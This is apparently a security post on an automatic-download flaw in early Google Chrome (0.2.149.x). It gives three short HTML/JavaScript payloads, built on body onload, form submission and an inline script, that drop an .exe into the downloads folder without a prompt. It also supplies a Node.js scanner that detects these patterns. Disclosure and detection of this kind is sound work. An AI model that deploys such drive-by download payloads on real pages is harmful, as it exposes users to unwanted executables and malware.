Google Chrome Automatic File Download Exploit Part Two

Picking up where the first automatic file download exploit left off, a few variations achieve the same effect in newer versions of Google Chrome. Rather than using an iframe or script tag to start the download, as its predecessors did, this version does it through the body and form tags with a bit of JavaScript.

Using the body tag (the onload handler navigates straight to the file):

<body onload="document.location='http://example.com/path/to/file.exe'">
</body>

Using form and body tags (the onload handler submits a form whose action is the file):

<body onload="document.download.submit()">
<form name="download" action="http://example.com/path/to/file.exe">
</form>
</body>

Using a form tag (an inline script submits the form as soon as it is parsed):

<form name="download" action="http://example.com/path/to/file.exe">
</form>
<script>document.download.submit();</script>

All of these work without any prompt and drop the file into the user's download folder, as long as Chrome is not set to ask where to save each file before downloading (which is the default). Note that the file only lands on disk; nothing on the page runs it, so the attack still depends on the user opening it later. Special thanks to mustlive for finding these.
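As an added example (not from the original post or from mustlive's advisory), the following Node.js scanner flags the two trigger shapes shown above in static HTML: a script-driven assignment to document.location that points at an executable, and a script-driven submit() of a form whose action does. It looks only at code that runs without user action (onload handlers and script bodies), so a normal link to file.exe is not reported. The sample pages, the extension list beyond .exe, and the function names are all constructed here for illustration.

```javascript
// Extensions treated as "executable download" targets. Only .exe appears in
// the original post; the remaining extensions are an assumption.
const EXECUTABLE_EXT = /\.(?:exe|msi|scr|bat|cmd|com|pif|hta|vbs)$/i;

// True when the URL's path (not its host) ends in an executable extension,
// so "http://example.com" is not mistaken for a .com file.
function isExecutableUrl(url) {
  try {
    const { pathname } = new URL(url, "http://placeholder.invalid/");
    return EXECUTABLE_EXT.test(pathname);
  } catch {
    return false;
  }
}

// Pull one attribute value out of a single start-tag string ("..." / '...' / bare).
function attr(tag, name) {
  const re = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, "i");
  const m = re.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Collect every piece of script that runs without user action:
// inline onload handlers on any tag, and <script> bodies.
function autoRunScripts(html) {
  const out = [];
  let m;
  const tagRe = /<([a-z][a-z0-9]*)\b[^>]*>/gi;
  while ((m = tagRe.exec(html)) !== null) {
    const handler = attr(m[0], "onload");
    if (handler !== null) out.push({ where: `<${m[1].toLowerCase()} onload>`, code: handler });
  }
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  while ((m = scriptRe.exec(html)) !== null) out.push({ where: "<script>", code: m[1] });
  return out;
}

// Map form name (or id) -> action so a submit() call can be resolved to its target URL.
function formActions(html) {
  const out = {};
  let m;
  const formRe = /<form\b[^>]*>/gi;
  while ((m = formRe.exec(html)) !== null) {
    const name = attr(m[0], "name") ?? attr(m[0], "id");
    const action = attr(m[0], "action");
    if (name !== null && action !== null) out[name] = action;
  }
  return out;
}

// Flag the two trigger shapes from the post: a script-driven navigation to an
// executable URL, and a script-driven submit() of a form whose action is one.
function findAutoDownloadTriggers(html) {
  const findings = [];
  const forms = formActions(html);
  const navRe = /(?:(?:document|window)\.)?location(?:\.href)?\s*=\s*['"]([^'"]+)['"]/gi;
  const submitRe = /document\.(?:forms\s*\[\s*['"]([^'"]+)['"]\s*\]|([A-Za-z_$][\w$]*))\.submit\s*\(\s*\)/g;
  for (const { where, code } of autoRunScripts(html)) {
    let m;
    while ((m = navRe.exec(code)) !== null) {
      if (isExecutableUrl(m[1])) findings.push({ kind: "location-assign", where, url: m[1] });
    }
    while ((m = submitRe.exec(code)) !== null) {
      const name = m[1] ?? m[2];
      const action = forms[name];
      if (action !== undefined && isExecutableUrl(action)) {
        findings.push({ kind: "form-submit", where, form: name, url: action });
      }
    }
  }
  return findings;
}

// Constructed sample pages: the three variants from the post plus a benign page
// that uses the same constructs against non-executable targets.
const SAMPLES = {
  bodyOnload: `<html><body onload="document.location='http://example.com/path/to/file.exe'"></body></html>`,
  formOnload: `<html><body onload="document.download.submit()">
<form name="download" action="http://example.com/path/to/file.exe"></form></body></html>`,
  formScript: `<html><body><form name="download" action="http://example.com/path/to/file.exe"></form>
<script>document.download.submit();</script></body></html>`,
  benign: `<html><body onload="document.location='http://example.com/welcome.html'">
<form name="search" action="/search"></form><script>document.search.submit();</script></body></html>`,
};

// Returns { sampleName: [findings...] } for every sample above.
function scanSamples() {
  const result = {};
  for (const [label, html] of Object.entries(SAMPLES)) result[label] = findAutoDownloadTriggers(html);
  return result;
}

console.log(JSON.stringify(scanSamples(), null, 2));
```

Run it with node; it prints one finding for each of the three exploit variants and none for the benign page. A regex scan like this is a triage aid, not an HTML parser: obfuscated handlers, setTimeout wrappers, or forms created at runtime will slip past it, so treat it as a first filter before loading a suspect page in an instrumented browser.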

Affected Versions
0.2.149.27
0.2.149.29

References
http://websecurity.com.ua/2423/
